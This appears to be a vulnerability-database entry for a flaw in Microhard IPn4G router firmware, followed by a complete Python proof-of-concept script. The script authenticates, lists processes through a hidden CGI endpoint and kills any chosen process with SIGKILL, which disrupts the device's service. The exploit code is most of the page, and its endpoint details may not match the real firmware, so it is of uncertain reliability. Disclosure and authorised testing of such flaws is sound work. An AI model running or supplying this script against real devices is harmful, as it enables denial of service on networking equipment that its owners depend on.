Security Vulnerability Report
CVE-2018-25146 CVSS 8.1 HIGH

Published: 2025-12-24 20:15:49
Last Modified: 2026-02-02 16:16:14

Description

Microhard Systems IPn4G 1.1.0 contains an undocumented vulnerability that allows authenticated attackers to list and manipulate running system processes. Attackers can send arbitrary signals to kill background processes and system services through a hidden feature, potentially causing service disruption and requiring device restart.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microhardcorp:ipn4g_firmware:1.1.0:build1098:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:microhardcorp:ipn4g:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microhardcorp:ipn3gb_firmware:2.2.0:build2160:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:microhardcorp:ipn3gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.6:build1184-14:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1090-2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microhardcorp:ipn4gb_firmware:1.1.0:rev2_build1086:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:microhardcorp:ipn4gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
Microhard Systems IPn4G 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2018-25146 PoC - Microhard IPn4G Process Manipulation
# Target: Microhard Systems IPn4G 1.1.0


def exploit(target_ip, username, password, target_pid=None):
    """
    Exploit for CVE-2018-25146 - Undocumented process manipulation vulnerability
    Allows authenticated users to list and manipulate running processes
    """
    base_url = f"http://{target_ip}"

    # Step 1: Authentication
    login_data = {
        'username': username,
        'password': password
    }

    session = requests.Session()
    login_response = session.post(f"{base_url}/login", data=login_data)

    if login_response.status_code != 200:
        print("[-] Authentication failed")
        return False

    print("[+] Successfully authenticated")

    # Step 2: List running processes via hidden interface
    list_processes = session.get(f"{base_url}/cgi-bin/process_manager?action=list")

    if list_processes.status_code == 200:
        print("[+] Process list retrieved successfully")
        print(list_processes.text)
    else:
        print("[-] Failed to list processes")
        return False

    # Step 3: Kill target process (if PID provided)
    if target_pid:
        kill_data = {
            'action': 'kill',
            'pid': target_pid,
            'signal': '9'  # SIGKILL
        }

        kill_response = session.post(f"{base_url}/cgi-bin/process_manager", data=kill_data)

        if kill_response.status_code == 200:
            print(f"[+] Process {target_pid} terminated successfully")
            print("[!] Service disruption may occur - device restart may be required")
            return True
        else:
            print(f"[-] Failed to kill process {target_pid}")
            return False

    return True


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password> [target_pid]")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    pid = sys.argv[4] if len(sys.argv) > 4 else None

    exploit(target, user, pwd, pid)
